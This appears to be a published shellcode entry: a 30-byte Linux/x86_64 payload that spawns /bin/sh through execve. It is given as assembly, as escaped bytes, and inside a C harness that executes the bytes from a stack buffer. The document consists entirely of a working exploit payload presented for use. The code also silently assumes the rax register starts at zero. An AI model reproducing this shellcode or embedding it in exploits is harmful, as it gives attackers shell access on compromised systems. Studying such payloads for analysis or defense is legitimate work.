# Title : Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Published : 2010-04-25
# Author : zbt
# Linux/x86_64 execve("/bin/sh"); 30 bytes shellcode
# Date: 2010-04-26
# Author: zbt
# Tested on: x86_64 Debian GNU/Linux
/*
; execve("/bin/sh", ["/bin/sh"], NULL)
section .text
global _start
_start:
xor rdx, rdx
mov qword rbx, '//bin/sh'
shr rbx, 0x8
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 0x3b
syscall
*/
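int main(void)
{
    /*
     * Test harness for the 30-byte execve("/bin/sh") payload shown in the
     * assembly listing above: the bytes are placed in an automatic (stack)
     * array and that array is then invoked as a function.
     *
     * The array is one byte longer than the payload because the string
     * literal carries a trailing '\0'; it sits after the syscall
     * instruction and is never executed.
     *
     * The indirect call only succeeds on a stack that is mapped
     * executable. With the usual NX / non-executable-stack protection the
     * call faults (SIGSEGV) -- that is the mitigation working as intended,
     * not a defect in the harness.
     */
    char shellcode[] =
        "\x48\x31\xd2"                              // xor %rdx, %rdx
        "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68"  // mov $0x68732f6e69622f2f, %rbx
        "\x48\xc1\xeb\x08"                          // shr $0x8, %rbx
        "\x53"                                      // push %rbx
        "\x48\x89\xe7"                              // mov %rsp, %rdi
        "\x50"                                      // push %rax
        "\x57"                                      // push %rdi
        "\x48\x89\xe6"                              // mov %rsp, %rsi
        "\xb0\x3b"                                  // mov $0x3b, %al
        "\x0f\x05";                                 // syscall

    /* Converting an object pointer to a function pointer is not portable
     * ISO C, but it is the conventional way such test harnesses transfer
     * control to the buffer on Linux/x86_64 toolchains. */
    (*(void (*)(void)) shellcode)();
    return 0;
}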